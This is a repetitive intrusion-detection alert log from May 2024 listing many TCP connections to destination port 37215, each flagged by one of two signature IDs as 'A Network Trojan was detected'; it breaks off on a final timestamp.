              Timestamp:05/24/24-10:59:00.448001
              SID:2829579
              Source Port:42502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857633
              SID:2835222
              Source Port:52292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278134
              SID:2829579
              Source Port:54618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671697
              SID:2829579
              Source Port:45572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866432
              SID:2835222
              Source Port:51608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423401
              SID:2835222
              Source Port:54010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.586060
              SID:2835222
              Source Port:37704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395450
              SID:2835222
              Source Port:59782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642246
              SID:2835222
              Source Port:33168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.427370
              SID:2835222
              Source Port:54978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099748
              SID:2829579
              Source Port:58038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400625
              SID:2835222
              Source Port:40462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411428
              SID:2829579
              Source Port:49196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269144
              SID:2829579
              Source Port:51696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070368
              SID:2829579
              Source Port:33498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.990751
              SID:2835222
              Source Port:52574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457002
              SID:2829579
              Source Port:60074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202871
              SID:2835222
              Source Port:58364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208344
              SID:2835222
              Source Port:35910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489368
              SID:2835222
              Source Port:38572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300194
              SID:2829579
              Source Port:46216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631658
              SID:2829579
              Source Port:37648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638066
              SID:2829579
              Source Port:60916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505401
              SID:2829579
              Source Port:48582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458364
              SID:2835222
              Source Port:55314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397729
              SID:2835222
              Source Port:34948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.704281
              SID:2835222
              Source Port:34034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858463
              SID:2829579
              Source Port:49412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201678
              SID:2829579
              Source Port:55364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446423
              SID:2829579
              Source Port:54904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169135
              SID:2835222
              Source Port:47106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920731
              SID:2829579
              Source Port:36760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103679
              SID:2829579
              Source Port:36860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057205
              SID:2829579
              Source Port:59426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394115
              SID:2829579
              Source Port:40612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797072
              SID:2835222
              Source Port:44780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062372
              SID:2829579
              Source Port:36704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537641
              SID:2829579
              Source Port:45736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.163581
              SID:2835222
              Source Port:39956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483763
              SID:2829579
              Source Port:58034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535775
              SID:2829579
              Source Port:52346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502430
              SID:2835222
              Source Port:47910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235585
              SID:2835222
              Source Port:42888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505136
              SID:2835222
              Source Port:45076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445780
              SID:2835222
              Source Port:56916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589248
              SID:2829579
              Source Port:45784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965820
              SID:2829579
              Source Port:33278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448726
              SID:2835222
              Source Port:50460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153147
              SID:2835222
              Source Port:55000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127258
              SID:2829579
              Source Port:55954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099933
              SID:2835222
              Source Port:51414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.887004
              SID:2829579
              Source Port:35370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361273
              SID:2835222
              Source Port:38800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522367
              SID:2835222
              Source Port:49304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544207
              SID:2835222
              Source Port:35380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313750
              SID:2829579
              Source Port:32876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589302
              SID:2835222
              Source Port:37428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.771650
              SID:2835222
              Source Port:60282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055340
              SID:2829579
              Source Port:39920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801574
              SID:2829579
              Source Port:42266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044658
              SID:2835222
              Source Port:41340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694633
              SID:2835222
              Source Port:43714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394488
              SID:2829579
              Source Port:40654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485256
              SID:2835222
              Source Port:56428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574518
              SID:2835222
              Source Port:58500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377467
              SID:2835222
              Source Port:49614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926361
              SID:2829579
              Source Port:35372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.401553
              SID:2829579
              Source Port:54562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550798
              SID:2835222
              Source Port:56354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671805
              SID:2835222
              Source Port:40074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859609
              SID:2829579
              Source Port:38520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202648
              SID:2835222
              Source Port:53010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663738
              SID:2835222
              Source Port:48080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196849
              SID:2835222
              Source Port:35168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574798
              SID:2829579
              Source Port:45608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428806
              SID:2835222
              Source Port:35514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209597
              SID:2835222
              Source Port:38734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361522
              SID:2829579
              Source Port:47564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365310
              SID:2835222
              Source Port:33250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167506
              SID:2829579
              Source Port:44942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994231
              SID:2835222
              Source Port:54860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279008
              SID:2835222
              Source Port:46464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520147
              SID:2835222
              Source Port:34758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456979
              SID:2829579
              Source Port:44880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233741
              SID:2829579
              Source Port:60282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433574
              SID:2835222
              Source Port:40786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.206466
              SID:2829579
              Source Port:45504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582670
              SID:2829579
              Source Port:48408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254182
              SID:2835222
              Source Port:55488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625190
              SID:2829579
              Source Port:56758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596321
              SID:2829579
              Source Port:46342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623317
              SID:2829579
              Source Port:49440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.076238
              SID:2829579
              Source Port:50004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.068073
              SID:2835222
              Source Port:53746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.643016
              SID:2835222
              Source Port:54672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982354
              SID:2829579
              Source Port:54538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873916
              SID:2835222
              Source Port:42488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.775516
              SID:2829579
              Source Port:37838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201183
              SID:2835222
              Source Port:43058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433600
              SID:2835222
              Source Port:38572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516504
              SID:2829579
              Source Port:34882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727303
              SID:2829579
              Source Port:49218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189001
              SID:2829579
              Source Port:40154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332387
              SID:2835222
              Source Port:53262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119438
              SID:2829579
              Source Port:49104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148921
              SID:2829579
              Source Port:38214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429681
              SID:2829579
              Source Port:41586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700502
              SID:2829579
              Source Port:40436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576414
              SID:2829579
              Source Port:57422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279797
              SID:2835222
              Source Port:59210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113297
              SID:2829579
              Source Port:51352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040739
              SID:2829579
              Source Port:33324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866185
              SID:2835222
              Source Port:46488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801514
              SID:2835222
              Source Port:50900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.242014
              SID:2829579
              Source Port:46232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538054
              SID:2829579
              Source Port:33016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.706448
              SID:2829579
              Source Port:59914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207569
              SID:2835222
              Source Port:56938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347558
              SID:2835222
              Source Port:40800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.968983
              SID:2829579
              Source Port:50842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.068840
              SID:2829579
              Source Port:55358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161726
              SID:2835222
              Source Port:41774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477135
              SID:2829579
              Source Port:34202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536889
              SID:2835222
              Source Port:52776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329691
              SID:2829579
              Source Port:43756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727375
              SID:2835222
              Source Port:48038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920607
              SID:2835222
              Source Port:56468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756398
              SID:2829579
              Source Port:42604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551348
              SID:2835222
              Source Port:58088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420905
              SID:2835222
              Source Port:57034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.744868
              SID:2835222
              Source Port:55530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458375
              SID:2835222
              Source Port:34574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483544
              SID:2829579
              Source Port:57366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726007
              SID:2829579
              Source Port:37118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994269
              SID:2835222
              Source Port:52304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483147
              SID:2829579
              Source Port:47116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066287
              SID:2829579
              Source Port:59712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.883661
              SID:2835222
              Source Port:58644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421624
              SID:2829579
              Source Port:49524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662019
              SID:2835222
              Source Port:59044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.117965
              SID:2835222
              Source Port:42216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404279
              SID:2835222
              Source Port:41678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044294
              SID:2835222
              Source Port:40464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.403054
              SID:2835222
              Source Port:35894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186462
              SID:2835222
              Source Port:37278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154315
              SID:2835222
              Source Port:47646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638937
              SID:2829579
              Source Port:55390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724426
              SID:2829579
              Source Port:54106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.775359
              SID:2829579
              Source Port:58148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574335
              SID:2835222
              Source Port:39782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061793
              SID:2835222
              Source Port:35936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111321
              SID:2835222
              Source Port:46002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060777
              SID:2835222
              Source Port:53786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045334
              SID:2829579
              Source Port:38882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368636
              SID:2829579
              Source Port:51212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543751
              SID:2835222
              Source Port:51666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504157
              SID:2829579
              Source Port:50378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856536
              SID:2829579
              Source Port:34540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921022
              SID:2829579
              Source Port:40334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251687
              SID:2829579
              Source Port:41796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341573
              SID:2829579
              Source Port:48640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662545
              SID:2835222
              Source Port:39992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105476
              SID:2829579
              Source Port:60904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828514
              SID:2835222
              Source Port:33488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.981054
              SID:2835222
              Source Port:42740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409260
              SID:2835222
              Source Port:40838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799242
              SID:2829579
              Source Port:59614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329751
              SID:2829579
              Source Port:35312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859030
              SID:2829579
              Source Port:49516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062372
              SID:2829579
              Source Port:35202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551176
              SID:2835222
              Source Port:40750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642785
              SID:2835222
              Source Port:40908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661314
              SID:2835222
              Source Port:52098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979434
              SID:2829579
              Source Port:57768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425897
              SID:2829579
              Source Port:41684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640600
              SID:2835222
              Source Port:34772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099542
              SID:2835222
              Source Port:60004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980862
              SID:2835222
              Source Port:39452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127423
              SID:2829579
              Source Port:34282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817758
              SID:2829579
              Source Port:52572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101051
              SID:2829579
              Source Port:39310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341119
              SID:2835222
              Source Port:59862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535620
              SID:2829579
              Source Port:39150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.643477
              SID:2835222
              Source Port:55980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.660863
              SID:2829579
              Source Port:56886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100540
              SID:2835222
              Source Port:53038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920615
              SID:2835222
              Source Port:51956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429710
              SID:2829579
              Source Port:45476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516307
              SID:2835222
              Source Port:35164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639312
              SID:2835222
              Source Port:53050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374526
              SID:2829579
              Source Port:42968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600139
              SID:2829579
              Source Port:39774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061892
              SID:2829579
              Source Port:33040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284644
              SID:2835222
              Source Port:40956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544302
              SID:2829579
              Source Port:55302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624399
              SID:2835222
              Source Port:55438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692245
              SID:2835222
              Source Port:49594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878753
